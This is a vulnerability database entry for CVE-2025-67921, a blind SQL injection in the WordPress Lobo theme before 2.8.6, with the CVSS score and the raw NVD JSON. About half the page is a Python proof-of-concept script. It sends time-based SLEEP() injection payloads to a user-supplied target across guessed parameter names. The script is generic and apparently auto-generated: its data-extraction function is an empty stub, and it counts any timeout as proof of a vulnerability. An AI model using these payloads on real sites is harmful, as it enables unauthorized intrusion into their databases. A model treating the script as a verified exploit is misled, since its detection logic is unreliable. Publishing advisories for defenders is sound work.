Security Vulnerability Report
中文
CVE-2025-67921 CVSS 8.5 HIGH

CVE-2025-67921

Published: 2026-01-08 10:15:51
Last Modified: 2026-04-27 18:16:49

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in VanKarWai Lobo lobo allows Blind SQL Injection.This issue affects Lobo: from n/a through < 2.8.6.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

VanKarWai Lobo < 2.8.6
Lobo Theme (WordPress) n/a through < 2.8.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67921 Blind SQL Injection PoC for WordPress Lobo Theme # Target: VanKarWai Lobo Theme < 2.8.6 # Type: Blind SQL Injection # CVSS: 8.5 (High) import requests import time import sys target_url = input("Enter target URL: ") # Payload for time-based blind SQL injection # Testing with MySQL SLEEP() function payloads = [ "1' AND SLEEP(5)-- -", "1' AND (SELECT * FROM (SELECT SLEEP(5))a)-- -", "1' OR SLEEP(5)-- -" ] def test_blind_sql_injection(url, payload): """Test for blind SQL injection vulnerability""" headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/x-www-form-urlencoded' } # Common vulnerable parameters params = ['id', 'page_id', 'cat_id', 'author', 'p', 'search'] for param in params: data = {param: payload} start_time = time.time() try: response = requests.post(url, data=data, headers=headers, timeout=10) elapsed = time.time() - start_time if elapsed >= 5: print(f"[+] VULNERABLE! Parameter: {param}") print(f"[+] Payload: {payload}") print(f"[+] Response time: {elapsed:.2f}s") return True except requests.exceptions.Timeout: print(f"[!] Timeout occurred - likely vulnerable") return True except Exception as e: print(f"[-] Error: {e}") return False def extract_data(url, payload_template): """Extract data using blind SQL injection""" print("\n[*] Starting data extraction...") # Example: Extract database version payload = payload_template.format( query="SELECT @@VERSION" ) # Implement extraction logic here print(f"[*] Payload: {payload}") if __name__ == "__main__": print("=" * 50) print("CVE-2025-67921 Blind SQL Injection Tester") print("Target: WordPress Lobo Theme < 2.8.6") print("=" * 50) for payload in payloads: print(f"\n[*] Testing payload: {payload}") if test_blind_sql_injection(target_url, payload): print("[+] Vulnerability confirmed!") break print("\n[!] Note: This PoC is for educational and authorized testing purposes only.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67921", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:51.100", "lastModified": "2026-04-27T18:16:49.207", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in VanKarWai Lobo lobo allows Blind SQL Injection.This issue affects Lobo: from n/a through < 2.8.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/lobo/vulnerability/wordpress-lobo-theme-2-8-6-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}